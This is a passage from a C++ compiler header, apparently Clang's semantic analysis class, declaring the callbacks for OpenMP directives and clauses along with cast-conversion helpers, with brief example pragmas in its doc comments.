StmtResult ActOnOpenMPTaskgroupDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp flush'.
StmtResult ActOnOpenMPFlushDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp depobj'.
StmtResult ActOnOpenMPDepobjDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp scan'.
StmtResult ActOnOpenMPScanDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp ordered' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPOrderedDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp atomic' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPAtomicDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target data' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTargetDataDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target enter data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetEnterDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target exit data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetExitDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target parallel' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp cancellation point'.
StmtResult
ActOnOpenMPCancellationPointDirective(SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp cancel'.
StmtResult ActOnOpenMPCancelDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp taskloop' after parsing of the
/// associated statement.
StmtResult
ActOnOpenMPTaskLoopDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPDistributeDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target update'.
StmtResult ActOnOpenMPTargetUpdateDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp distribute parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target simd' after parsing of
/// the associated statement.
StmtResult
ActOnOpenMPTargetSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute simd' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target teams distribute' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for
/// simd' after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Checks correctness of linear modifiers.
bool CheckOpenMPLinearModifier(OpenMPLinearClauseKind LinKind,
SourceLocation LinLoc);
/// Checks that the specified declaration matches requirements for the linear
/// decls.
bool CheckOpenMPLinearDecl(const ValueDecl *D, SourceLocation ELoc,
OpenMPLinearClauseKind LinKind, QualType Type,
bool IsDeclareSimd = false);
/// Called on well-formed '\#pragma omp declare simd' after parsing of
/// the associated method/function.
DeclGroupPtrTy ActOnOpenMPDeclareSimdDirective(
DeclGroupPtrTy DG, OMPDeclareSimdDeclAttr::BranchStateTy BS,
Expr *Simdlen, ArrayRef<Expr *> Uniforms, ArrayRef<Expr *> Aligneds,
ArrayRef<Expr *> Alignments, ArrayRef<Expr *> Linears,
ArrayRef<unsigned> LinModifiers, ArrayRef<Expr *> Steps, SourceRange SR);
/// Checks '\#pragma omp declare variant' variant function and original
/// functions after parsing of the associated method/function.
/// \param DG Function declaration to which the declare variant directive is
/// applied.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param TI The trait info object representing the match clause.
/// \returns None if the function/variant function are not compatible with
/// the pragma; otherwise, the pair of original function and variant ref
/// expression.
Optional<std::pair<FunctionDecl *, Expr *>>
checkOpenMPDeclareVariantFunction(DeclGroupPtrTy DG, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
/// Called on well-formed '\#pragma omp declare variant' after parsing of
/// the associated method/function.
/// \param FD Function declaration to which the declare variant directive is
/// applied.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p FD.
/// \param TI The context traits associated with the function variant.
void ActOnOpenMPDeclareVariantDirective(FunctionDecl *FD, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
OMPClause *ActOnOpenMPSingleExprClause(OpenMPClauseKind Kind,
Expr *Expr,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocator' clause.
OMPClause *ActOnOpenMPAllocatorClause(Expr *Allocator,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'if' clause.
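/// An 'if' clause may carry a directive-name modifier, captured in
/// NameModifier. Illustrative OpenMP source this callback handles (a sketch;
/// 'n' is a placeholder):
///
///  #pragma omp parallel for if(parallel: n > 1024)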
OMPClause *ActOnOpenMPIfClause(OpenMPDirectiveKind NameModifier,
Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation NameModifierLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'final' clause.
OMPClause *ActOnOpenMPFinalClause(Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_threads' clause.
OMPClause *ActOnOpenMPNumThreadsClause(Expr *NumThreads,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'safelen' clause.
OMPClause *ActOnOpenMPSafelenClause(Expr *Length,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simdlen' clause.
OMPClause *ActOnOpenMPSimdlenClause(Expr *Length, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'collapse' clause.
OMPClause *ActOnOpenMPCollapseClause(Expr *NumForLoops,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'ordered' clause.
OMPClause *
ActOnOpenMPOrderedClause(SourceLocation StartLoc, SourceLocation EndLoc,
SourceLocation LParenLoc = SourceLocation(),
Expr *NumForLoops = nullptr);
/// Called on well-formed 'grainsize' clause.
OMPClause *ActOnOpenMPGrainsizeClause(Expr *Size, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_tasks' clause.
OMPClause *ActOnOpenMPNumTasksClause(Expr *NumTasks, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'hint' clause.
OMPClause *ActOnOpenMPHintClause(Expr *Hint, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'detach' clause.
OMPClause *ActOnOpenMPDetachClause(Expr *Evt, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSimpleClause(OpenMPClauseKind Kind,
unsigned Argument,
SourceLocation ArgumentLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'default' clause.
OMPClause *ActOnOpenMPDefaultClause(llvm::omp::DefaultKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'proc_bind' clause.
OMPClause *ActOnOpenMPProcBindClause(llvm::omp::ProcBindKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'order' clause.
OMPClause *ActOnOpenMPOrderClause(OpenMPOrderClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(OpenMPDependClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSingleExprWithArgClause(
OpenMPClauseKind Kind, ArrayRef<unsigned> Arguments, Expr *Expr,
SourceLocation StartLoc, SourceLocation LParenLoc,
ArrayRef<SourceLocation> ArgumentsLoc, SourceLocation DelimLoc,
SourceLocation EndLoc);
/// Called on well-formed 'schedule' clause.
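/// M1/M2 carry the optional schedule modifiers and ChunkSize the optional
/// chunk expression. Illustrative OpenMP source (a sketch):
///
///  #pragma omp for schedule(monotonic: dynamic, 4)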
OMPClause *ActOnOpenMPScheduleClause(
OpenMPScheduleClauseModifier M1, OpenMPScheduleClauseModifier M2,
OpenMPScheduleClauseKind Kind, Expr *ChunkSize, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation M1Loc, SourceLocation M2Loc,
SourceLocation KindLoc, SourceLocation CommaLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPClause(OpenMPClauseKind Kind, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nowait' clause.
OMPClause *ActOnOpenMPNowaitClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'untied' clause.
OMPClause *ActOnOpenMPUntiedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'mergeable' clause.
OMPClause *ActOnOpenMPMergeableClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'read' clause.
OMPClause *ActOnOpenMPReadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'write' clause.
OMPClause *ActOnOpenMPWriteClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'capture' clause.
OMPClause *ActOnOpenMPCaptureClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'seq_cst' clause.
OMPClause *ActOnOpenMPSeqCstClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acq_rel' clause.
OMPClause *ActOnOpenMPAcqRelClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acquire' clause.
OMPClause *ActOnOpenMPAcquireClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'release' clause.
OMPClause *ActOnOpenMPReleaseClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'relaxed' clause.
OMPClause *ActOnOpenMPRelaxedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'destroy' clause.
OMPClause *ActOnOpenMPDestroyClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'threads' clause.
OMPClause *ActOnOpenMPThreadsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simd' clause.
OMPClause *ActOnOpenMPSIMDClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nogroup' clause.
OMPClause *ActOnOpenMPNogroupClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedAddressClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_shared_memory' clause.
OMPClause *ActOnOpenMPUnifiedSharedMemoryClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reverse_offload' clause.
OMPClause *ActOnOpenMPReverseOffloadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dynamic_allocators' clause.
OMPClause *ActOnOpenMPDynamicAllocatorsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'atomic_default_mem_order' clause.
OMPClause *ActOnOpenMPAtomicDefaultMemOrderClause(
OpenMPAtomicDefaultMemOrderClauseKind Kind, SourceLocation KindLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPVarListClause(
OpenMPClauseKind Kind, ArrayRef<Expr *> Vars, Expr *DepModOrTailExpr,
const OMPVarListLocTy &Locs, SourceLocation ColonLoc,
CXXScopeSpec &ReductionOrMapperIdScopeSpec,
DeclarationNameInfo &ReductionOrMapperId, int ExtraModifier,
ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc, bool IsMapTypeImplicit,
SourceLocation ExtraModifierLoc);
/// Called on well-formed 'inclusive' clause.
OMPClause *ActOnOpenMPInclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'exclusive' clause.
OMPClause *ActOnOpenMPExclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocate' clause.
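/// Allocator is the optional allocator expression. Illustrative OpenMP
/// source using a predefined allocator (a sketch; 'a' is a placeholder):
///
///  #pragma omp task firstprivate(a) allocate(omp_high_bw_mem_alloc: a)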
OMPClause *
ActOnOpenMPAllocateClause(Expr *Allocator, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation ColonLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'private' clause.
OMPClause *ActOnOpenMPPrivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'firstprivate' clause.
OMPClause *ActOnOpenMPFirstprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'lastprivate' clause.
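/// LPKind captures the OpenMP 5.0 'conditional' modifier. Illustrative
/// source (a sketch):
///
///  #pragma omp simd lastprivate(conditional: x)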
OMPClause *ActOnOpenMPLastprivateClause(
ArrayRef<Expr *> VarList, OpenMPLastprivateModifier LPKind,
SourceLocation LPKindLoc, SourceLocation ColonLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'shared' clause.
OMPClause *ActOnOpenMPSharedClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reduction' clause.
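/// Modifier captures an OpenMP 5.0 reduction modifier such as 'inscan'.
/// Illustrative source (a sketch):
///
///  #pragma omp for reduction(inscan, +: sum)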
OMPClause *ActOnOpenMPReductionClause(
ArrayRef<Expr *> VarList, OpenMPReductionClauseModifier Modifier,
SourceLocation StartLoc, SourceLocation LParenLoc,
SourceLocation ModifierLoc, SourceLocation ColonLoc,
SourceLocation EndLoc, CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'task_reduction' clause.
OMPClause *ActOnOpenMPTaskReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'in_reduction' clause.
OMPClause *ActOnOpenMPInReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'linear' clause.
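/// LinKind captures the 'val'/'uval'/'ref' modifier and Step the linear
/// step expression. Illustrative source (a sketch):
///
///  #pragma omp simd linear(val(i): 4)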
OMPClause *
ActOnOpenMPLinearClause(ArrayRef<Expr *> VarList, Expr *Step,
SourceLocation StartLoc, SourceLocation LParenLoc,
OpenMPLinearClauseKind LinKind, SourceLocation LinLoc,
SourceLocation ColonLoc, SourceLocation EndLoc);
/// Called on well-formed 'aligned' clause.
OMPClause *ActOnOpenMPAlignedClause(ArrayRef<Expr *> VarList,
Expr *Alignment,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyin' clause.
OMPClause *ActOnOpenMPCopyinClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyprivate' clause.
OMPClause *ActOnOpenMPCopyprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'flush' pseudo clause.
OMPClause *ActOnOpenMPFlushClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depobj' pseudo clause.
OMPClause *ActOnOpenMPDepobjClause(Expr *Depobj, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depend' clause.
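/// DepModifier captures an optional OpenMP 5.0 iterator modifier and DepKind
/// the dependence type. Illustrative source (a sketch):
///
///  #pragma omp task depend(iterator(it = 0:n), in: a[it])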
OMPClause *
ActOnOpenMPDependClause(Expr *DepModifier, OpenMPDependClauseKind DepKind,
SourceLocation DepLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'device' clause.
OMPClause *ActOnOpenMPDeviceClause(OpenMPDeviceClauseModifier Modifier,
Expr *Device, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ModifierLoc,
SourceLocation EndLoc);
/// Called on well-formed 'map' clause.
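/// MapTypeModifiers/MapType capture the modifier list and map type.
/// Illustrative source (a sketch; 'N' is a placeholder):
///
///  #pragma omp target map(always, to: arr[0:N])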
OMPClause *
ActOnOpenMPMapClause(ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc,
CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
OpenMPMapClauseKind MapType, bool IsMapTypeImplicit,
SourceLocation MapLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'num_teams' clause.
OMPClause *ActOnOpenMPNumTeamsClause(Expr *NumTeams, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'thread_limit' clause.
OMPClause *ActOnOpenMPThreadLimitClause(Expr *ThreadLimit,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'priority' clause.
OMPClause *ActOnOpenMPPriorityClause(Expr *Priority, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dist_schedule' clause.
OMPClause *ActOnOpenMPDistScheduleClause(
OpenMPDistScheduleClauseKind Kind, Expr *ChunkSize,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation KindLoc,
SourceLocation CommaLoc, SourceLocation EndLoc);
/// Called on well-formed 'defaultmap' clause.
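/// M is the implicit behavior and Kind the variable category. Illustrative
/// source (a sketch):
///
///  #pragma omp target defaultmap(firstprivate: scalar)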
OMPClause *ActOnOpenMPDefaultmapClause(
OpenMPDefaultmapClauseModifier M, OpenMPDefaultmapClauseKind Kind,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation MLoc,
SourceLocation KindLoc, SourceLocation EndLoc);
/// Called on well-formed 'to' clause.
OMPClause *
ActOnOpenMPToClause(ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'from' clause.
OMPClause *ActOnOpenMPFromClause(
ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'use_device_ptr' clause.
OMPClause *ActOnOpenMPUseDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'is_device_ptr' clause.
OMPClause *ActOnOpenMPIsDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'nontemporal' clause.
OMPClause *ActOnOpenMPNontemporalClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Data for list of allocators.
struct UsesAllocatorsData {
/// Allocator.
Expr *Allocator = nullptr;
/// Allocator traits.
Expr *AllocatorTraits = nullptr;
/// Locations of '(' and ')' symbols.
SourceLocation LParenLoc, RParenLoc;
};
/// Called on well-formed 'uses_allocators' clause.
OMPClause *ActOnOpenMPUsesAllocatorClause(SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc,
ArrayRef<UsesAllocatorsData> Data);
/// The kind of conversion being performed.
enum CheckedConversionKind {
/// An implicit conversion.
CCK_ImplicitConversion,
/// A C-style cast.
CCK_CStyleCast,
/// A functional-style cast.
CCK_FunctionalCast,
/// A cast other than a C-style cast.
CCK_OtherCast,
/// A conversion for an operand of a builtin overloaded operator.
CCK_ForBuiltinOverloadedOp
};
static bool isCast(CheckedConversionKind CCK) {
return CCK == CCK_CStyleCast || CCK == CCK_FunctionalCast ||
CCK == CCK_OtherCast;
}
/// ImpCastExprToType - If Expr is not of type 'Type', insert an implicit
/// cast. If there is already an implicit cast, merge into the existing one.
/// The value kind of the result is given by \p VK.
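/// Illustrative call (a sketch; 'E' is a placeholder expression):
///
///  ExprResult Res = ImpCastExprToType(E, Context.DoubleTy, CK_FloatingCast);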
ExprResult ImpCastExprToType(Expr *E, QualType Type, CastKind CK,
ExprValueKind VK = VK_RValue,
const CXXCastPath *BasePath = nullptr,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
/// ScalarTypeToBooleanCastKind - Returns the cast kind corresponding
/// to the conversion from scalar type ScalarTy to the Boolean type.
static CastKind ScalarTypeToBooleanCastKind(QualType ScalarTy);
/// IgnoredValueConversions - Given that an expression's result is
/// syntactically ignored, perform any conversions that are
/// required.
ExprResult IgnoredValueConversions(Expr *E);
// UsualUnaryConversions - promotes integers (C99 6.3.1.1p2) and converts
